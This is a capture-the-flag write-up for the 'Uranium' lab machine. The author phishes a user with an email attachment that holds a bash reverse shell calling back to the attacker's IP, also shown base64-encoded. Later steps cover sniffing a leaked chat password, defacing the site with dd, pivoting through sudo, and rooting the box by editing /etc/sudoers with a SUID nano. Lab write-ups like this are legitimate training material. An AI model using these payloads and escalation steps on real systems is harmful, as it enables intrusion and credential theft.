Uranium CTF
Machine type: HARD
We have reached the account of one of the employees, [hakanbey](https://twitter.com/hakanbe40520689).
In this room, you will learn about one of the phishing attack methods. I tried to design a phishing room (built around cron jobs and services) as much as I could.
Special thanks to kral4 for helping us make this room.
Note: Please do not attack the given twitter account.
What we are required to do:
Flag 1: What is the required password for the chat app?
Flag 2: What is the password of the hakanbey user?
Flag 3: user_1.txt
Flag 4: user_2.txt
Flag 5: web_flag.txt
Flag 6: root.txt
Let's kick off with nmap to get the blueprint of the system.
```
┌──(stuxnet8㉿stuxnet8)-[~/Downloads]
└─$ nmap -sC -sV 10.10.232.30
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 08:46 EAT
Nmap scan report for 10.10.232.30
Host is up (0.37s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a1:3c:d7:e9:d0:85:40:33:d5:07:16:32:08:63:31:05 (RSA)
| 256 24:81:0c:3a:91:55:a0:65:9e:36:58:71:51:13:6c:34 (ECDSA)
|_ 256 c2:94:2b:0d:8e:a9:53:f6:ef:34:db:f1:43:6c:c1:7e (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: uranium, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=uranium
| Subject Alternative Name: DNS:uranium
| Not valid before: 2021-04-09T21:40:53
|_Not valid after: 2031-04-07T21:40:53
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Uranium Coin
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: Host: uranium; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.96 seconds
```
So we see three open ports: 22 for SSH, 25 for SMTP (Simple Mail Transfer Protocol), which tells us mail is used for communication on this box, and 80 for HTTP, the web server.
Brute-forcing the web directories gives:
```
[08:43:06] 403 - 277B - /.htpasswd_test
[08:43:31] 200 - 771B - /README.txt
[08:43:32] 200 - 17KB - /LICENSE.txt
[08:44:15] 301 - 313B - /assets -> http://10.10.232.30/assets/
[08:44:15] 200 - 1KB - /assets/
[08:44:55] 301 - 313B - /images -> http://10.10.232.30/images/
[08:44:55] 200 - 2KB - /images/
[08:44:57] 200 - 10KB - /index.html
[08:45:43] 403 - 277B - /server-status/
[08:45:43] 403 - 277B - /server-status
```
Let's look at the site.

Checking the source code yields nothing useful. Let's visit the Twitter account of the mentioned user, hakanbey.

From the Twitter account we get a domain, uranium.thm. Let's add it to our /etc/hosts, just for good practice (appending with tee -a, so the existing entries are kept):
```
echo "10.10.241.108 uranium.thm" | sudo tee -a /etc/hosts
```
His second comment says that we can send an application file to his mail account, which he opens and reviews from the terminal. Mmmhhh, I don't know much about sending mail from the terminal, so let's google for some tools that can help us : )
I found the two most commonly used tools:
swaks (Swiss Army Knife for SMTP)
sendemail
So now we have two options for sending email to hakanbey, but let's keep in mind that he opens attachments named application. So we have to create a file called application and put something in it, maybe just a hello:
```
echo "Hello mambo vipi" > application
```
Let's go with the sendemail option first to see if it works:
```
sendemail -t hakanbey@uranium.thm -f stuxnet8@stuxnet8.com -s uranium.thm -u "Tell me about the coins" -m "Hello" -a application -o tls=no
```
-t = the recipient
-f = the sender (us)
-s = the SMTP server; the default port 25 is chosen automatically
-u = subject
-m = message body
-a = attachment
-o tls=no = do not use TLS (Transport Layer Security, the encryption and authentication protocol that secures Internet communications); the server offers STARTTLS, but we send in plain text
```
sendemail -t hakanbey@uranium.thm -f stuxnet8@stuxnet8.com -s uranium.thm -u "Tell me about the coins" -m "Hello" -a application -o tls=no
Aug 22 09:41:09 stuxnet8 sendemail[18025]: Email was sent successfully!
```
Cool, we get a response that our email was sent successfully to hakanbey. Option 2:
```
swaks --to hakanbey@uranium.thm --from stuxnet8@stuxnet8.com --header "RE:Coins" --body "I want coins" --attach application --server 10.10.232.30
```
We get the following SMTP exchange:
```
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future. Prefix filenames with '@' instead.
=== Trying 10.10.232.30:25...
=== Connected to 10.10.232.30.
<- 220 uranium ESMTP Postfix (Ubuntu)
-> EHLO stuxnet8
<- 250-uranium
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250 SMTPUTF8
-> MAIL FROM:<hakanbey@uranium.thm>
<- 250 2.1.0 Ok
-> RCPT TO:<hakanbey@uranium.thm>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Mon, 22 Aug 2022 09:42:30 +0300
-> To: hakanbey@uranium.thm
-> From: stuxnet8@stuxnet8.com
-> Subject: test Mon, 22 Aug 2022 09:42:30 +0300
-> Message-Id: <20220822094225.018036@stuxnet8>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_18036"
-> RE:Coins
->
-> ------=_MIME_BOUNDARY_000_18036
-> Content-Type: text/plain
->
-> I want coins
-> ------=_MIME_BOUNDARY_000_18036
-> Content-Type: application/octet-stream; name="application"
-> Content-Description: application
-> Content-Disposition: attachment; filename="application"
-> Content-Transfer-Encoding: BASE64
->
-> YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjIuMTk4LzQ0NDQgMD4mMSIK
->
-> ------=_MIME_BOUNDARY_000_18036--
->
->
-> .
<- 250 2.0.0 Ok: queued as 5C110406A6
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.
```
Cool, both work fine. Let's put a reverse shell one-liner in the application file to get a reverse shell........ : )
```
└─$ echo 'bash -c "bash -i >& /dev/tcp/10.9.2.198/4444 0>&1"' > application
```
Let's open netcat in another terminal, listening on port 4444, and resend the mail with the new attachment. And we get our shell:
```
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.2.198] from (UNKNOWN) [10.10.232.30] 35680
bash: cannot set terminal process group (1785): Inappropriate ioctl for device
bash: no job control in this shell
hakanbey@uranium:~$ ls
ls
chat_with_kral4
mail_file
user_1.txt
```
Since we are in, we can quickly grab user_1.txt to complete task 3:
```
hakanbey@uranium:~$ cat user_1.txt
cat user_1.txt
thm{REDACTED}
```
Let's move around the box to see if there is another user and, if so, what his name is and how we get his creds.
```
hakanbey@uranium:/$ cd /home
cd /home
hakanbey@uranium:/home$ ls
ls
hakanbey
kral4
```
Cool, it seems we have another user called kral4, so for now we have two users, hakanbey and kral4. We can't get into kral4 since we don't have his creds, so let's leave him alone for now. Let's go get the web flag, since we know where it is stored: /var/www/html.
```
hakanbey@uranium:/var/www/html$ ls
ls
assets
images
index.html
LICENSE.txt
README.txt
web_flag.txt
hakanbey@uranium:/var/www/html$ cat web_flag.txt
cat web_flag.txt
cat: web_flag.txt: Permission denied
```
Oohh, no permission to read the flag. Mmhhh, so what are we missing? Let's check the mail folder, since these two have to communicate somehow.
```
cat: mail_file: Is a directory
hakanbey@uranium:~$ cd mail_file
cd mail_file
hakanbey@uranium:~/mail_file$ ls
ls
hakanbey@uranium:~/mail_file$ ls -la
ls -la
total 8
drwxrwxr-x 2 hakanbey hakanbey 4096 Aug 22 06:25 .
drwxr-xr-x 7 hakanbey hakanbey 4096 May 4 2021 ..
```
We don't have any mail, so that's fine, but there seems to be an interesting file in /var/log.
```
hakanbey@uranium:/var$ cd log
cd log
hakanbey@uranium:/var/log$ ls
ls
alternatives.log
amazon
apache2
apport.log
apt
auth.log
aws114_ssm_agent_installation.log
bootstrap.log
btmp
cloud-init.log
cloud-init-output.log
dist-upgrade
dpkg.log
faillog
hakanbey_network_log.pcap
installer
journal
kern.log
landscape
lastlog
mail.log
openvpn
syslog
tallylog
unattended-upgrades
wtmp
```
If we look closely we can see a pcap file called hakanbey_network_log.pcap. Pcap files are very interesting to inspect, since most of the time they contain important info such as creds, which could be in plain text. Let's transfer it to our machine using Python's built-in HTTP server.
```
hakanbey@uranium:/var/log$ python3 -m http.server
python3 -m http.server
10.9.2.198 - - [22/Aug/2022 06:33:29] "GET /hakanbey_network_log.pcap HTTP/1.1" 200 -
10.9.2.198 - - [22/Aug/2022 06:34:40] "GET /hakanbey_network_log.pcap HTTP/1.1" 200 -
```
On our machine, let's fetch it:
```
wget http://10.10.232.30:8000/hakanbey_network_log.pcap
--2022-08-22 09:33:29-- http://10.10.232.30:8000/hakanbey_network_log.pcap
Connecting to 10.10.232.30:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1869 (1.8K) [application/vnd.tcpdump.pcap]
Saving to: ‘hakanbey_network_log.pcap’
hakanbey_network_log.pcap 100%[=======================================================>] 1.83K 827 B/s in 2.3s
2022-08-22 09:33:32 (827 B/s) - ‘hakanbey_network_log.pcap’ saved [1869/1869]
```
Great, now we have the pcap file; let's analyse it.

Following the TCP stream of the first packet produces the results shown above. MBMD1........ is the password for the chat app they are using, so that's a giveaway. Anyway, cool, let's move on.
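What "follow TCP stream" did for us can be reproduced without Wireshark. As an added example, not part of the original writeup, here is a minimal classic-pcap reader that reassembles each TCP connection's payload and reports lines carrying the plaintext PASSWORD prompt; the capture, ports and password value are constructed, not taken from the real hakanbey_network_log.pcap.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4  # classic libpcap only; pcapng and nanosecond captures are not handled

def build_pcap(packets):
    """Wrap (src_ip, sport, dst_ip, dport, payload) tuples as Ethernet/IPv4/TCP
    frames in a little-endian pcap file. Constructed test data, not a real capture."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)]  # linktype 1 = Ethernet
    for i, (src, sport, dst, dport, data) in enumerate(packets):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, i, 0, 5 << 4, 0x18, 65535, 0, 0) + data
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
        frame = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip  # dst MAC, src MAC, ethertype IPv4
        out.append(struct.pack("<IIII", 0, i, len(frame), len(frame)) + frame)
    return b"".join(out)

def tcp_streams(pcap):
    """Return {(src, sport, dst, dport): concatenated TCP payload} in first-seen
    order: a plain 'follow TCP stream' without sequence-number reordering."""
    (magic,) = struct.unpack("<I", pcap[:4])
    end = {PCAP_MAGIC: "<", 0xD4C3B2A1: ">"}.get(magic)  # big-endian writers flip the magic
    if end is None:
        raise ValueError("not a classic pcap file")
    streams, off = {}, 24  # skip the 24-byte global header
    while off + 16 <= len(pcap):  # each record: 16-byte header, then the frame
        (incl_len,) = struct.unpack(end + "I", pcap[off + 8:off + 12])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00":  # ethertype: IPv4 only
            continue
        (total_len,) = struct.unpack("!H", frame[16:18])
        ip = frame[14:14 + total_len]  # drops any Ethernet padding or trailer
        if ip[9] != 6:  # protocol: TCP only
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:]  # header length = IHL * 4
        sport, dport = struct.unpack("!HH", tcp[:4])
        key = (".".join(map(str, ip[12:16])), sport, ".".join(map(str, ip[16:20])), dport)
        streams[key] = streams.get(key, b"") + tcp[(tcp[12] >> 4) * 4:]  # data offset * 4
    return streams

def leaked_passwords(pcap):
    """Lines carrying 'PASSWORD' in any stream: the chat login travels in clear text."""
    return [(key, line.decode("latin-1").strip())
            for key, data in tcp_streams(pcap).items()
            for line in data.split(b"\n") if b"PASSWORD" in line]

# Constructed capture: login prompt one way, kral4's greeting back. Ports and the
# password value are placeholders, not taken from hakanbey_network_log.pcap.
SAMPLE_PCAP = build_pcap([
    ("192.168.1.108", 50000, "192.168.1.10", 5555, b"PASSWORD :<constructed_password>\n"),
    ("192.168.1.10", 5555, "192.168.1.108", 50000, b"kral4:hi hakanbey\n"),
])

if __name__ == "__main__":
    print(leaked_passwords(SAMPLE_PCAP))
```

Point `tcp_streams` at the bytes of a real capture to list every connection; anything the chat client sent before a TLS handshake would show up here just as readably.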
So now we know the password for the chat app, let's chat with kral4; he probably knows our password, since in the pcap he says he knows it anyway : )
Let's get back in through our mail shell and chat with kral4 to see what he has got.
```
hakanbey@uranium:~$ ./chat_with_kral4
./chat_with_kral4
PASSWORD :MBMD1vdpjg3kGv6SsIz56VNG
kral4:hi hakanbey
->ls
hakanbey:ls
?
->password
hakanbey:password
?
->hi
hakanbey:hi
kral4:how are you?
->am good
hakanbey:am good
kral4:what now? did you forgot your password again
->yes i did
hakanbey:yes i did
kral4:okay your password is <REDACTED> don't lose it PLEASE
kral4:i have to go
kral4 disconnected
connection terminated
hakanbey@uranium:~$ exit
```
So at first I thought I would just use commands, which is why you see me use the ls command.

So I politely asked kral4 for my password and he gave it to me.
Cool, that helps you answer the second question. We can now SSH in as hakanbey, since we have his creds.
```
┌──(stuxnet8㉿stuxnet8)-[~/Downloads]
└─$ ssh hakanbey@uranium.thm
hakanbey@uranium.thm's password:
Permission denied, please try again.
hakanbey@uranium.thm's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Aug 22 06:50:28 UTC 2022
System load: 0.0 Memory usage: 38% Processes: 112
Usage of /: 46.8% of 8.79GB Swap usage: 0% Users logged in: 0
=> There were exceptions while processing one or more plugins. See
/var/log/landscape/sysinfo.log for more information.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
14 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
No mail.
Last login: Thu May 6 13:50:11 2021 from 192.168.1.108
hakanbey@uranium:~$
```
What can hakanbey run as superuser with sudo?
```
hakanbey@uranium:~$ sudo -l
[sudo] password for hakanbey:
Matching Defaults entries for hakanbey on uranium:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hakanbey may run the following commands on uranium:
(kral4) /bin/bash
```
Wait, what...... that's pretty cool. The following command does the magic:
```
hakanbey@uranium:~$ sudo -u kral4 /bin/bash
```
Let's get the user_2 flag ASAP.
```
kral4@uranium:/home/kral4$ ls
chat_with_hakanbey user_2.txt
kral4@uranium:/home/kral4$ cat user_2.txt
thm{REDACTED}
```
Heading into /var/mail to see if we have any mail as user kral4:
```
kral4@uranium:/var/mail$ cat kral4
From root@uranium.thm Sat Apr 24 13:22:02 2021
Return-Path: <root@uranium.thm>
X-Original-To: kral4@uranium.thm
Delivered-To: kral4@uranium.thm
Received: from uranium (localhost [127.0.0.1])
by uranium (Postfix) with ESMTP id C7533401C2
for <kral4@uranium.thm>; Sat, 24 Apr 2021 13:22:02 +0000 (UTC)
Message-ID: <841530.943147035-sendEmail@uranium>
From: "root@uranium.thm" <root@uranium.thm>
To: "kral4@uranium.thm" <kral4@uranium.thm>
Subject: Hi Kral4
Date: Sat, 24 Apr 2021 13:22:02 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-992935.514616878"
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-992935.514616878
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
I give SUID to the nano file in your home folder to fix the attack on our index.html. Keep the nano there, in case it happens again.
------MIME delimiter for sendEmail-992935.514616878--
```
So it seems he gave SUID to a nano binary to fix some sort of attack on index.html. Mmmhhh, interesting. Well, let's try getting the web flag as kral4:
```
kral4@uranium:/var/www/html$ ls
assets images index.html LICENSE.txt README.txt web_flag.txt
kral4@uranium:/var/www/html$ cat web_flag.txt
cat: web_flag.txt: Permission denied
```

This was now getting on my nerves....... OK, what are we missing? Let's see if we can change the home page (index.html). Being honest, I didn't think it was going to work, but I had to try it out, since the root user's mail mentioned SUID in connection with fixing index.html. So I did some googling and found out about file write, file read, SUID and sudo. Apparently this means that if a binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor.
Let's try it out:
```
echo "This site is hacked by stuxnet8" | ./dd of=index.html
```
```
kral4@uranium:/var/www/html$ echo "This site is hacked by stuxnet8" | /bin/dd of=index.html
0+1 records in
0+1 records out
6 bytes copied, 0.000608526 s, 9.9 kB/s
You have new mail in /var/mail/kral4
```
Oohh, we have to visit the index.html page to see if it changed, and once you go there and refresh we can see that we finally have access to this site's index.html page. Awesome! Plus we get new mail; let's see what it says.
```
hakanbey kral4
kral4@uranium:/var/mail$ cat kral4
From root@uranium.thm Sat Apr 24 13:22:02 2021
Return-Path: <root@uranium.thm>
X-Original-To: kral4@uranium.thm
Delivered-To: kral4@uranium.thm
Received: from uranium (localhost [127.0.0.1])
by uranium (Postfix) with ESMTP id C7533401C2
for <kral4@uranium.thm>; Sat, 24 Apr 2021 13:22:02 +0000 (UTC)
Message-ID: <841530.943147035-sendEmail@uranium>
From: "root@uranium.thm" <root@uranium.thm>
To: "kral4@uranium.thm" <kral4@uranium.thm>
Subject: Hi Kral4
Date: Sat, 24 Apr 2021 13:22:02 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-992935.514616878"
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-992935.514616878
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
I give SUID to the nano file in your home folder to fix the attack on our index.html. Keep the nano there, in case it happens again.
------MIME delimiter for sendEmail-992935.514616878--
From root@uranium.thm Mon Aug 22 07:04:40 2022
Return-Path: <root@uranium.thm>
X-Original-To: kral4@uranium.thm
Delivered-To: kral4@uranium.thm
Received: from uranium (localhost [127.0.0.1])
by uranium (Postfix) with ESMTP id 219EE40616
for <kral4@uranium.thm>; Mon, 22 Aug 2022 07:04:40 +0000 (UTC)
Message-ID: <808219.703703315-sendEmail@uranium>
From: "root@uranium.thm" <root@uranium.thm>
To: "kral4@uranium.thm" <kral4@uranium.thm>
Subject: Hi Kral4
Date: Mon, 22 Aug 2022 07:04:40 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-65705.4070188714"
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-65705.4070188714
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
I think our index page has been hacked again. You know how to fix it, I am giving authorization.
------MIME delimiter for sendEmail-65705.4070188714--
```
Oopps, they noticed that we hacked their index page, so they gave kral4 the authorization to run... what?
```
kral4@uranium:/var/mail$ cd /home/kral4
kral4@uranium:/home/kral4$ ls
chat_with_hakanbey nano user_2.txt
```
It seems like we have permission to execute the nano file. Recently I was studying for my Linux exam and there was a question about adding people to the sudoers file and giving them permission to execute certain commands, or all commands, as superuser (the sudoers group). So I thought about giving it a try to see if it's possible to assign myself all privileges, since I had the creds of hakanbey.

```
kral4@uranium:/etc$ cd /home/kral4
kral4@uranium:/home/kral4$ ./nano /etc/sudoers
kral4@uranium:/home/kral4$ exit
exit
hakanbey@uranium:~$ sudo su
[sudo] password for hakanbey:
root@uranium:/home/hakanbey# cd /root
root@uranium:~# ls
htmlcheck.py root.txt
root@uranium:~# cat root.txt
thm{REDACTED}
```
And we are now root. Awesome, we can submit the root flag to get our points.
So now the web flag is last. Mmmhhh, that's easy then, since we are root: /var/www/html/
```
root@uranium:/var/www/html# cat web_flag.txt
thm{REDACTED}
```
And we are done with the room. My opinion on the room is that this was an easy room but very tricky, and it needed attention on each and every thing you do, so yes, I enjoyed it.
